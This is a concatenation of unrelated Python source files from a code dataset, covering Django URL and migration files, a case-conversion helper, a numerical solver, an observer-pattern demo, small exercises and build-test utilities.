    For every path string, the pyfileconf context's recorded config
    dependencies are looked up and converted into ItemView instances.
    """
    # Imported lazily to avoid import cycles with pyfileconf at module load.
    from pyfileconf import context
    from pyfileconf.selector.models.itemview import ItemView

    def _views_for(path_str: str) -> List[ItemView]:
        # Each dependency exposes a section path; build an ItemView from it.
        deps = context.config_dependencies[path_str]
        return [ItemView.from_section_path_str(dep.path_str) for dep in deps]

    return {path_str: _views_for(path_str) for path_str in section_path_strs}
| StarcoderdataPython |
3355315 | <reponame>rafarbop/Python<gh_stars>0
# Desafio 27 Curso em Video Python
# Este programa ler o nome completo de uma pessoa e mostra o primeiro e o último nome.
# By Rafabr
import os
# Clear the terminal (POSIX `clear`; on Windows this would be `cls`).
os.system('clear')
print('\nDesafio 27')
print('Este programa ler o nome completo de uma pessoa e mostra o primeiro e o último nome.\n\n')
# Normalize the input once: lower-case and strip surrounding whitespace.
nome = str(input('Digite o nome completo de uma pessoa: ')).lower().strip()
# Split once instead of twice (the original called nome.split() per print).
partes = nome.split()
print()
print(f"O primeiro nome da pessoa informada é: {partes[0].title()}")
print(f"O último nome da pessoa informada é: {partes[-1].title()}")
print('\n---Fim da execução---\n')
| StarcoderdataPython |
from .base import Base
from ..responses import user
class UserCategory(Base):
    """API category exposing user-related methods."""

    async def get_me(self, **kwargs) -> user.User:
        """Call the ``getMe`` API method and wrap the response in a User model."""
        # locals() here captures self and kwargs, exactly as the base
        # class's parameter builder expects.
        params = self.get_set_params(locals())
        raw_response = await self.api.request("getMe", params)
        return user.User(**raw_response)
| StarcoderdataPython |
3207456 | <gh_stars>1-10
from vedo import Plotter
from morphapi.api.neuromorphorg import NeuroMorpOrgAPI
# Client for the neuromorpho.org REST API.
api = NeuroMorpOrgAPI()
# ---------------------------- Downloading metadata --------------------------- #
# Get metadata for pyramidal neurons from the mouse cortex.
metadata, _ = api.get_neurons_metadata(
    size=10,  # Can get the metadata for up to 500 neurons at the time
    species="mouse",
    cell_type="pyramidal",
    brain_region="neocortex",
)
# To get a list of available query fields: print(api.fields)
# To get a list of valid values for a field: print(api.get_fields_values(field))
print("Neurons metadata:")
print(metadata[0])
# ---------------------------- Download morphology --------------------------- #
# Download the SWC morphology for the sixth result (requires >= 6 matches).
neurons = api.download_neurons(metadata[5])
# ------------------------------- Visualisation ------------------------------ #
print("creating meshes")
# create_mesh() returns a 2-tuple; index 1 is presumably the whole-neuron
# mesh used for rendering — TODO confirm against morphapi docs.
neurons = [neuron.create_mesh()[1] for neuron in neurons]
print("visualizing")
# One subplot per neuron, with axes enabled.
vp = Plotter(shape=(1, len(neurons)), axes=1)
vp.show(neurons)
| StarcoderdataPython |
"""
The program SUMS all of the NUMBERS entered by the USER,
while ignoring any input that is not a VALID NUMBER.
"""
# Import MATH module
import math
# Acquisition and Control of the DATA entered by the USER
number = input("Enter the NUMBER to add: ")
numbers = []
# BUG FIX: current_sum must exist even when the user never enters a valid
# number (e.g. presses Enter immediately); the original raised NameError in
# the final print in that case.
current_sum = 0
while number != "":
    try:
        # Storing the entered number (int when no decimal point, else float)
        if "." not in number:
            numbers.append(int(number))
        else:
            numbers.append(float(number))
        # Displaying the CURRENT SUM (shown as int when it has no fraction)
        current_sum = sum(numbers)
        if current_sum - math.trunc(current_sum) == 0:
            current_sum = int(current_sum)
        print("Current Sum = " + str(current_sum))
        number = input("Enter the NUMBER to add: ")
    # Non-numeric input is reported and skipped; the user is re-prompted
    except ValueError:
        print("Warning, a NON-NUMERIC value has been entered.")
        number = input("Enter the NUMBER to add: ")

# Displaying the RESULTS
print("The SUM of the NUMBERS entered is {} ".format(current_sum))
print("NUMBERS entered -> ", end="")
if len(numbers) == 0:
    print("NO ONE")
else:
    for value in numbers:
        print(value, end=" ")
| StarcoderdataPython |
import matplotlib.pyplot as plt
import mdtraj as md
from contact_map import ContactMap
# PDB snapshots from two different stretches of the trajectory.
pdb_list = [ "../pdb_dir_1_500ns/frame0.pdb",
            "../pdb_dir_5001_6000ns/frame4164.pdb"]

# Program takes about several minutes to finish
# It is a bit slow;
# BUG FIX: the original never defined `contacts`, so the difference
# computation below raised NameError; collect each frame's map here.
contacts = []
for i in range(len(pdb_list)):
    pdb = md.load_pdb(pdb_list[i])
    frame_contacts = ContactMap(pdb[0], cutoff=1.5)
    contacts.append(frame_contacts)
    (fig, ax) = frame_contacts.residue_contacts.plot(cmap='seismic', vmin=-1, vmax=1)
    plt.xlabel("Residue")
    plt.ylabel("Residue")
    fig.savefig(f'cont-map-{i}.pdf', format='pdf', dpi=500)
    plt.close()

# Calculate the difference between two contact maps
diff = contacts[1] - contacts[0]
(fig, ax) = diff.residue_contacts.plot(cmap='seismic', vmin=-1, vmax=1)
plt.xlabel("Residue")
plt.ylabel("Residue")
fig.savefig(f'cont-map-diff.pdf', format='pdf', dpi=500)
plt.close()
| StarcoderdataPython |
from django.contrib import admin
from django.urls import path, include
from . import views
# /student/..
# URL routes for the student-facing pages and JSON endpoints.
# NOTE(review): the route string 'invitaions/' below is misspelled; it is a
# live URL, so fixing it would break existing links — coordinate before
# renaming and add a redirect if changed.
urlpatterns = [
    path('', views.studentDashboard, name="student_dashboard"),
    path('postad/<str:pk>/', views.postAd, name="post_ad"),
    path('ads/', views.Ads, name="ads"),
    path('wishlist/', views.wishList, name="wishlist"),
    path('<str:pk>/ads/', views.AdsDelete, name="ads_delete"),
    # Tutor browsing, liking and wish-listing (the /like/ and /wish-list/
    # routes are class-based views used as AJAX toggles).
    path('tutors/', views.allTutors, name="all_tutors"),
    path('tutors/<int:id>', views.SpecificTutor, name="specific_tutor"),
    path('tutors/<int:id>/like/', views.PostLikeToggle.as_view(), name="post_like_std"),
    path('tutors/<int:id>/like/api/', views.PostLikeAPIToggle.as_view(), name="post_like_api_std"),
    path('tutors/<int:id>/wish-list/', views.WishlistApi.as_view(), name="wish_list"),
    path('tutors/<int:id>/', views.inviteFordemo, name="tutor_invite"),
    path('tutors/invited/', views.invited, name="invited"),
    # Demo invitations sent/received by the student
    path('invitaions/', views.invitations, name="invitations_student"),
    path("confirminvite/<int:id>/", views.acceptInvitation , name="accept_invite"),
    path("rejectinvite/<int:id>/", views.rejectInvite , name="reject_invite_std"),
    # Account pages
    path("about/", views.aboutStudent , name="student_about"),
    path("delaccount/", views.del_account_student , name="del_account"),
    path("yourad/<int:id>/", views.view_your_ad, name="view_your_ad_std"),
    # Email-verification activation link (uid + token)
    path("activate/<uidb64>/<token>/", views.activate_view, name="activate"),
]
| StarcoderdataPython |
MYSQL_USER = "root"
# --- MySQL connection settings (placeholders; override in deployment) ---
MYSQL_DATABASE = "database"
MYSQL_HOST = "127.0.0.1"
MYSQL_PORT = 3306
MYSQL_PASSWORD = "password"
# --- HTTP server bind address ---
PORT = 8080
HOST = "127.0.0.1"
DEBUG = False
# Items per page for the public listing vs the backend listing (names
# suggest pagination sizes — confirm against the view code).
REQUESTS_PER_PAGE = 10
BACKEND_REQUESTS_PER_PAGE = 5
# NetEase credentials and backend URL; port 3000 is presumably a local
# NeteaseCloudMusicApi instance — TODO confirm.
NETEASE_PHONE = "12312345678"
NETEASE_PASSWORD = "password"
NETEASE_BACKEND = "http://127.0.0.1:3000"
# Role passwords; these are placeholders — supply real secrets in deployment.
ADMIN_PASSWORD = "<PASSWORD>"
DJ_PASSWORD = "dj"
SEARCH_RESULT_COUNT_LIMIT = 30
3251241 | # -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
import re
from typing import Callable, Iterable
__all__ = ["RegexCubingHelper", "CommonCaseRegexPatterns", "CommonCaseConvertor", "shortcuts"]
class RegexCubingHelper:
"""The best way to resolve a Rubik's cube is to take it apart and put it back together."""
def __init__(self, patterns: Iterable[str]):
self._pattern = re.compile("|".join(patterns))
def cubing(self, string: str, transform_fn: Callable[[Iterable[str]], Iterable[str]], sep: str) -> str:
"""Join the string with the given separator and transform the parts."""
parts = (i for i in self._pattern.split(string) if i)
return sep.join((i for i in transform_fn(parts) if i))
def cubing_capitalize_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and capitalize the parts."""
return self.cubing(string, lambda parts: (i.capitalize() for i in parts), sep)
def cubing_lower_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and lower case the parts."""
return self.cubing(string, lambda parts: (i.lower() for i in parts), sep)
def cubing_upper_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and upper case the parts."""
return self.cubing(string, lambda parts: (i.upper() for i in parts), sep)
class CommonCaseRegexPatterns:
"""The regex pattern for common case."""
CAMELCASE = r"(?<=[^A-Z])(?=[A-Z])"
SNAKECASE = r"_+"
DASHCASE = r"-+"
DOTCASE = r"\.+"
SPACECASE = r" +"
class CommonCaseConvertor:
"""The convertor for common case."""
def __init__(self, patterns: Iterable[str]):
self._helper = RegexCubingHelper(patterns)
def to_camel_case(self, string: str) -> str:
"""
Convert the string to camel case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_camel_case("Cubing Case")
'CubingCase'
"""
return self._helper.cubing_capitalize_case(string, "")
def to_lower_camel_case(self, string: str) -> str:
"""Convert the string to lower camel case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_camel_case("Cubing Case")
'cubingCase'
"""
def transform(parts):
for index, part in enumerate(parts):
if index == 0:
yield part.lower()
else:
yield part.capitalize()
return self._helper.cubing(string, transform, "")
def to_lower_snake_case(self, string: str) -> str:
"""
Convert the string to lower snake case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_snake_case("Cubing Case")
'cubing_case'
"""
return self._helper.cubing_lower_case(string, "_")
def to_upper_snake_case(self, string: str) -> str:
"""
Convert the string to upper snake case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_upper_snake_case("Cubing Case")
'CUBING_CASE'
"""
return self._helper.cubing_upper_case(string, "_")
def to_lower_dash_case(self, string: str) -> str:
"""
Convert the string to lower dash case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_dash_case("Cubing Case")
'cubing-case'
"""
return self._helper.cubing_lower_case(string, "-")
def to_upper_dash_case(self, string: str) -> str:
"""Convert the string to upper dash case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_upper_dash_case("Cubing Case")
'CUBING-CASE'
"""
return self._helper.cubing_upper_case(string, "-")
def to_lower_dot_case(self, string: str) -> str:
"""Convert the string to lower dot case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_dot_case("Cubing Case")
'cubing.case'
"""
return self._helper.cubing_lower_case(string, ".")
def to_capitalize_dot_case(self, string: str) -> str:
"""Convert the string to upper dot case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_capitalize_dot_case("Cubing Case")
'Cubing.Case'
"""
return self._helper.cubing_capitalize_case(string, ".")
def to_lower_space_case(self, string: str) -> str:
    """Return *string* rewritten in lower space case.

    >>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
    >>> convertor.to_lower_space_case("Cubing Case")
    'cubing case'
    """
    separator = " "
    return self._helper.cubing_lower_case(string, separator)
# Ready-made convertor instance that recognises every supported source
# case style (camel, snake, dash, dot and space case).
shortcuts = CommonCaseConvertor(
    (
        CommonCaseRegexPatterns.CAMELCASE,
        CommonCaseRegexPatterns.SNAKECASE,
        CommonCaseRegexPatterns.DASHCASE,
        CommonCaseRegexPatterns.DOTCASE,
        CommonCaseRegexPatterns.SPACECASE,
    )
)
| StarcoderdataPython |
96669 | <reponame>zhichengMLE/python-design-pattern<gh_stars>0
# The observer pattern is a software design pattern in which an object, called the subject,
# maintains a list of its dependents, called observers, and notifies them automatically of
# any state changes, usually by calling one of their methods.
# See more in wiki: https://en.wikipedia.org/wiki/Observer_pattern
#
# We will use Observer pattern to build a subscription system which notify all observers
# when you have updates.
# Observer Class
class Observer(object):
    """A subscriber that prints every notification it receives."""

    def __init__(self, id):
        # Numeric identifier, used only to tag printed messages.
        self._id = id

    def update(self, message):
        """Print *message* prefixed with this observer's id."""
        text = "Observer %d get the update : %s" % (self._id, message)
        print(text)
# Subject Class: is being observed by Observer
class Subject(object):
    """Holds a list of observers and broadcasts the current message."""

    def __init__(self):
        self._observer_list = []
        self._message = ""

    def add_observer(self, observer):
        """Register *observer* to receive future notifications."""
        self._observer_list.append(observer)

    def set_message(self, message):
        """Store *message* as the payload for the next broadcast."""
        self._message = message

    def notify_observers(self):
        """Call update() with the stored message on every observer."""
        for subscriber in self._observer_list:
            subscriber.update(self._message)
if __name__ == '__main__':
    # Demo: observers subscribed before a broadcast receive it; observers
    # added afterwards only see the later messages.
    subject = Subject()
    subject.add_observer(Observer(1))
    subject.add_observer(Observer(2))
    subject.add_observer(Observer(3))
    subject.set_message("This is the overview of 2016, ...")
    subject.notify_observers()
    subject.add_observer(Observer(4))
    subject.add_observer(Observer(5))
    subject.set_message("This is the overview of 2017, ...")
    subject.notify_observers()
    subject.add_observer(Observer(6))
    subject.set_message("This is the overview of 2018, ...")
    subject.notify_observers()
| StarcoderdataPython |
3212139 | <gh_stars>0
import numpy as np
import probability_initial
import delay_file
def at2u0(pe, l, L, p_arr):
    """First-order extrapolation of a delayed boundary value.

    Reads the two most recent usable rows of the history buffer *p_arr*
    (column *pe*, delay *l*, buffer depth *L*) and combines them with
    weights (l+1, -l), which reduces to the newest value when l == 0.
    """
    newest = p_arr[int(L - 1 - l)][int(pe)]
    older = p_arr[int(L - 2 - l)][int(pe)]
    return (l + 1) * newest - l * older
def cd2u1(u,cx,dx,nx,Eqflag,Syncflag,L=None,PE=None,perPE=None,pstart=None,pend=None,ATolFLAG=None):
    '''Second-order central-difference spatial RHS for one time step.

    Computes rhs = -C * du/dx on the 1-D grid `u` of length `nx` with
    spacing `dx`, either synchronously (Syncflag == 'DSync') or with
    asynchronous processor boundaries read from the delayed history
    buffers `pstart`/`pend` (Syncflag == 'DAsync', PE processors of
    perPE points each, history depth L).

    Returns `rhs` in the synchronous case, and
    (rhs, pstart[1:], pend[1:]) in the asynchronous case.
    '''
    # u, rhs, C are all 1-D arrays of length nx.
    rhs=np.zeros_like(u)
    C=np.zeros_like(u)
    '''Concentration array'''
    # Advection speed: the solution itself for Burgers, constant cx for
    # the (advection / advection-diffusion) linear cases.
    if(Eqflag=='DBurgers'):
        C=u.copy()
    if((Eqflag=='DAdvection') or (Eqflag=='DAD')):
        for i in range(nx):
            C[i]=cx
    if(Syncflag=='DSync'):
        # Periodic boundary: endpoints u[0] and u[nx-1] share the same
        # neighbours u[1] and u[nx-2].
        rhs[0] = -C[0]*(u[1] - u[nx-2])/(2*dx)
        rhs[nx-1] = -C[nx-1]*(u[1] - u[nx-2])/(2*dx)
        for i in range(1,nx-1):
            rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
        return rhs
    elif(Syncflag=='DAsync'):
        ## Interior point computations (no inter-processor data needed) ##
        for pe in range(PE):
            for i in range(pe*perPE+1,perPE*(pe+1)-1):
                rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
        ## Assigning values to buffer array ##
        #L=max_delay
        ## pend with left_pt & pstart with right_pt ##
        # Each boundary stencil draws its own delay l; row L-1-l of the
        # history buffer holds the neighbour value delayed by l steps.
        # NOTE(review): delay_file.delay_() presumably samples a random
        # delay in [0, L-1] -- confirm against delay_file.
        if(ATolFLAG==None):
            l=int(delay_file.delay_())
            rhs[0] = -C[0]*(u[1] - pend[L-1-l][PE-1])/(2*dx)
            l=int(delay_file.delay_())
            # 0*PE == 0: column of the first processor's buffer.
            rhs[nx-1] = -C[nx-1]*(pstart[L-1-l][0*PE]- u[nx-2])/(2*dx)
            #Processor Boundary points
            for pe in range(PE-1):
                right_pt = perPE*(pe+1)-1
                l=int(delay_file.delay_())
                rhs[right_pt] = -C[right_pt]*(pstart[L-1-l][(right_pt+1)//perPE] - u[right_pt-1])/(2*dx)
                l=int(delay_file.delay_())
                left_pt = perPE*(pe+1)
                rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - pend[L-1-l][(left_pt+1)//perPE - 1])/(2*dx)
        elif(ATolFLAG=='DAT2'):
            # Second-order delay correction: at2u0 extrapolates across the
            # delay instead of using the stale buffer value directly.
            l=int(delay_file.delay_())
            rhs[0] = -C[0]*(u[1] - at2u0(PE-1,l,L,pend) )/(2*dx)
            l=int(delay_file.delay_())
            rhs[nx-1] = -C[nx-1]*( at2u0(0,l,L,pstart) - u[nx-2] )/(2*dx)
            #Processor Boundary points
            for pe in range(PE-1):
                right_pt = perPE*(pe+1)-1
                l=int(delay_file.delay_())
                # NOTE(review): true division here ((right_pt+1)/perPE)
                # vs floor division (//) elsewhere; at2u0 casts with
                # int(), so the result is the same -- but confirm intent.
                rhs[right_pt] = -C[right_pt]*( at2u0((right_pt+1)/perPE,l,L,pstart)- u[right_pt-1])/(2*dx)
                l=int(delay_file.delay_())
                left_pt = perPE*(pe+1)
                rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - at2u0((left_pt+1)//perPE - 1,l,L,pend))/(2*dx)
        # Drop the oldest history row; the caller appends the newest row.
        pstart_out=pstart[1:]
        pend_out=pend[1:]
        return rhs,pstart_out,pend_out
def euler(u, rhs, dt, nx):
    """Explicit (forward) Euler step: return u + dt * rhs.

    `u` and `rhs` are numpy arrays of length `nx`.  The vectorised
    expression makes `nx` redundant, but the parameter is kept for
    call-site compatibility.  The caller's `u` is not mutated; a new
    array is returned.
    """
    return u + dt * rhs
# import numpy as np
# import probability_initial
# import delay_file
# def cd2u1(u,cx,dx,nx,Eqflag,Syncflag,L=None,PE=None,perPE=None,pstart_in=None,pend_in=None):
# '''For a given time step t to t+delt'''
# # u,du,C all take 1-D
# rhs=np.zeros_like(u)
# C=np.zeros_like(u)
# '''Concentration array'''
# if(Eqflag=='DBurgers'):
# C=u.copy()
# if((Eqflag=='DAdvection') or (Eqflag=='DAD')):
# for i in range(nx):
# C[i]=cx
# if(Syncflag=='DSync'):
# rhs[0] = -C[0]*(u[1] - u[nx-2])/(2*dx)
# rhs[nx-1] = -C[nx-1]*(u[1] - u[nx-2])/(2*dx)
# for i in range(1,nx-1):
# rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
# return rhs
# elif(Syncflag=='DAsync'):
# ## Interior point computations ##
# for pe in range(PE):
# for i in range(pe*perPE+1,perPE*(pe+1)-1):
# rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
# ## Assigning values to buffer array ##
# #L=max_delay
# pstart=np.zeros((L,PE))
# pend=np.zeros((L,PE))
# pstart[:-1]=pstart_in
# pend[:-1]=pend_in
# pstart[L-1],pend[L-1]=probability_initial.prob_1D_from_u_1D(u,PE,perPE)
# ## pend with left_pt & pstart with right_pt ##
# #Different l use
# l=int(delay_file.delay_())
# rhs[0] = -C[0]*(u[1] - pend[L-1-l][PE-1])/(2*dx)
# l=int(delay_file.delay_())
# rhs[nx-1] = -C[nx-1]*(pstart[L-1-l][0*PE]- u[nx-2])/(2*dx)
# #Processor Boundary points
# for pe in range(PE-1):
# right_pt = perPE*(pe+1)-1
# l=int(delay_file.delay_())
# rhs[right_pt] = -C[right_pt]*(pstart[L-1-l][(right_pt+1)//perPE] - u[right_pt-1])/(2*dx)
# l=int(delay_file.delay_())
# left_pt = perPE*(pe+1)
# rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - pend[L-1-l][(left_pt+1)//perPE - 1])/(2*dx)
# pstart_out=pstart[1:]
# pend_out=pend[1:]
# return rhs,pstart_out,pend_out
# def euler(u,rhs,dt,nx):
# # v=np.zeros_like(u)
# # for i in range(nx):
# # v[i]=u[i]+dt*rhs[i]
# u=u+dt*rhs
# return u | StarcoderdataPython |
1713495 | <filename>URI-1042_Sort_Simples.py
# -------------------
# <NAME>
# URI 1042
# Sort Simples
# -------------------
# -*- coding: utf-8 -*-
# Read three integers from a single space-separated input line.
A,B,C = map (int,input().split())
LISTA = [A, B, C]
# Print the values in ascending order, then a blank line, then the
# values in the original input order (the URI 1042 output format).
for x in sorted(LISTA):
    print (x)
print("")
print(A)
print(B)
print(C)
1744290 | <gh_stars>0
#!/usr/bin/python3
# Author: <NAME>
# License: MIT
# ULR: https://github.com/iblis-ms/python_cmake_build_system
import os
import subprocess
from builtins import staticmethod
import sys
import urllib.request
import logging
from .sysOp import SysOp
class Utils:
    """
    Helper routines for the CMake build-system tests: lazy platform
    detection, file download and external-process execution.
    """

    @staticmethod
    def sysOp():
        """Return a lazily created, cached SysOp platform descriptor."""
        if not hasattr(Utils, 'sysop'):
            Utils.sysop = SysOp()
        return Utils.sysop

    @staticmethod
    def downloadScript(url, output_path):
        """Download *url* into *output_path*.

        Returns True on success; logs an error and returns False when the
        request fails or does not answer with HTTP 200.
        """
        logger = logging.getLogger("BuildSystemTest")
        try:
            # BUGFIX: the original called the absent third-party
            # `requests`; use the `urllib.request` already imported at
            # module level instead.
            with urllib.request.urlopen(url) as response:
                if response.getcode() != 200:
                    logger.error('Downloading ' + str(url) + ' to ' + str(output_path) + ' FAILED')
                    return False
                content = response.read()
        except OSError:  # URLError and socket errors are OSError subclasses
            logger.error('Downloading ' + str(url) + ' to ' + str(output_path) + ' FAILED')
            return False
        logger.info('Downloading ' + str(url) + ' to ' + str(output_path))
        # Context manager so the file handle is closed even on write errors.
        with open(output_path, 'wb') as output_file:
            output_file.write(content)
        return True

    @staticmethod
    def run(cmd, working_dir, env = None, collect_output = False, output_file_path = None):
        """Run *cmd* in *working_dir*, streaming its output to the logger.

        Parameters
        ----------
        cmd : list
            Program and arguments, e.g. ['cmake', '--build', '.'].
        working_dir : str
            Directory the command is executed from.
        env : dict, optional
            Environment for the child process (inherits ours when None).
        collect_output : bool
            When True, the captured output text is also returned.
        output_file_path : str, optional
            When given, the output is additionally written to this file.

        Returns
        -------
        tuple
            (return_code, output_text) -- output_text is None unless
            collect_output is True.
        """
        logger = logging.getLogger("BuildSystemTest")
        os.environ['PYTHONUNBUFFERED'] = "1"  # stream logs immediately, no buffering
        logger.info("####################################### <run> #######################################")
        logger.info("Working Directory: " + working_dir)
        logger.info("Command: " + ' '.join(cmd))
        # On Windows the command may need shell resolution (e.g. .bat files).
        shell = bool(Utils.sysOp().windows)
        proc = subprocess.Popen(cmd,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT,
                                cwd=working_dir,
                                shell=shell,
                                env=env)
        logger.info("-------------------------------------- <output> -------------------------------------")
        output_txt = ''
        output_file = open(output_file_path, "w") if output_file_path is not None else None
        try:
            while True:
                raw = proc.stdout.readline()
                # readline yields b'' at EOF; stop once the process exited too.
                if (raw == '' or raw == b'') and proc.poll() is not None:
                    break
                if raw:
                    decoded = raw.decode(errors='ignore')
                    if collect_output:
                        output_txt = output_txt + decoded
                    if output_file is not None:
                        output_file.write(decoded)
                    logger.info(decoded[:-1])  # strip the trailing newline
            proc.stdout.close()
            return_code = proc.poll()
        finally:
            if output_file is not None:
                output_file.close()
        logger.info("-------------------------------------- </output> ------------------------------------")
        logger.info("Return code: " + str(return_code))
        logger.info("####################################### </run> ######################################")
        if collect_output:
            return return_code, output_txt
        return return_code, None
| StarcoderdataPython |
16001 | <reponame>marin-leonard/marsha
# Generated by Django 3.0.6 on 2020-05-19 14:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add live-streaming fields to Video."""

    dependencies = [
        ("core", "0018_auto_20200603_0620"),
    ]

    operations = [
        # Nullable JSON blob holding the information needed to manage
        # live streaming; nullable/blank so existing rows are unaffected.
        migrations.AddField(
            model_name="video",
            name="live_info",
            field=models.JSONField(
                blank=True,
                help_text="Information needed to manage live streaming",
                null=True,
                verbose_name="Live info",
            ),
        ),
        # Lifecycle state of live mode, restricted to the four choices
        # below; null presumably means the video is not live at all --
        # confirm against the Video model.
        migrations.AddField(
            model_name="video",
            name="live_state",
            field=models.CharField(
                blank=True,
                choices=[
                    ("idle", "idle"),
                    ("starting", "starting"),
                    ("running", "running"),
                    ("stopped", "stopped"),
                ],
                help_text="state of the live mode.",
                max_length=20,
                null=True,
                verbose_name="live state",
            ),
        ),
    ]
| StarcoderdataPython |
1701705 | <filename>examples/plugins/workbench/AcmeLabUsingEggs/src/acme.acmelab/acme/acmelab/api.py
from acmelab import Acmelab
| StarcoderdataPython |
1658465 | <filename>abhisek/Separate_word_start_with_P.py
'''
Write a Python program to match if two words from a list of words starting with letter 'P'.
'''
import re
# Sample strings.
words = ["Python PHP", "Java JavaScript", "c c++"]

for word in words:
    # Match two consecutive words that both start with a capital P.
    match = re.search(r'(P\w+)\s{1,}(P\w+)', word)
    if match:
        # BUGFIX: the original used Python-2 print statements, which are
        # a SyntaxError on Python 3; the parenthesized form works on both.
        print("First word:")
        print(match.group(1))
        print("Second word:")
        print(match.group(2))
| StarcoderdataPython |
1747380 | <reponame>pka/ical2json
import argparse
import json
from datetime import date, timedelta, datetime
from icalevents import icalevents, icalparser
def ical_to_json(url, start, days):
    """Fetch events from the iCal feed at *url* in the window
    [*start*, *start* + *days*), sort them by normalized start time and
    return them serialized as a pretty-printed JSON string.
    """
    window_end = start + timedelta(days=days)
    events = icalevents.events(url=url, start=start, end=window_end)
    events.sort(key=lambda ev: icalparser.normalize(ev.start))
    return json.dumps(events,
                      indent=2,
                      ensure_ascii=False,
                      default=json_converter)
def json_converter(o):
    """json.dumps fallback: stringify datetimes and expand Event objects.

    Any other type falls through and yields None (JSON null).
    """
    if isinstance(o, datetime):
        return str(o)
    if isinstance(o, icalparser.Event):
        return event_to_dict(o)
def event_to_dict(event):
    """Map the public fields of an icalevents Event onto a plain dict."""
    field_names = (
        'summary', 'description', 'start', 'end', 'all_day', 'recurring',
        'location', 'private', 'created', 'last_modified', 'sequence',
        'attendee', 'organizer',
    )
    return {name: getattr(event, name) for name in field_names}
if __name__ == '__main__':
    # CLI: ical2json URL [--start YYYY-MM-DD] [--days N]
    parser = argparse.ArgumentParser()
    # Window start defaults to today; --days sets the window length.
    parser.add_argument("--start", type=date.fromisoformat,
                        default=date.today())
    parser.add_argument("--days", type=int, default=365)
    parser.add_argument("url")
    args = parser.parse_args()
    print(ical_to_json(args.url, args.start, args.days))
| StarcoderdataPython |
3310070 | <reponame>unistra/eva
from django.conf.urls import url
from .views import DegreeListView, DegreeTypeListView, DegreeTypeCreate, \
DegreeTypeUpdate, DegreeTypeDelete, DegreeCreateView, DegreeUpdateView, \
DegreeDeleteView
from django_cas.decorators import login_required
# CAS-protected CRUD routes for degrees and degree types.
urlpatterns = [
    # Degree list, filtered by '' / 'all' / 'current' and a component slug.
    url(r'^list/(?P<filter>|all|current)/(?P<cmp>\w+)/$',
        login_required(DegreeListView.as_view()),
        name='list'),
    # Degree create / edit / delete.
    url(r'^create$', login_required(DegreeCreateView.as_view()),
        name='degree_create'),
    url(r'^(?P<id>\d+)/$', login_required(DegreeUpdateView.as_view()),
        name='degree_edit'),
    url(r'^delete/(?P<id>\d+)/$', login_required(DegreeDeleteView.as_view()),
        name='degree_delete'),
    # Degree-type list and create / edit / delete.
    url(r'^type/$', login_required(DegreeTypeListView.as_view()),
        name='type'),
    url(r'^type/create$', login_required(DegreeTypeCreate.as_view()),
        name='type_create'),
    url(r'^type/(?P<id>\d+)/$', login_required(DegreeTypeUpdate.as_view()),
        name='type_edit'),
    url(r'^type/delete/(?P<id>\d+)/$',
        login_required(DegreeTypeDelete.as_view()),
        name='type_delete'),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.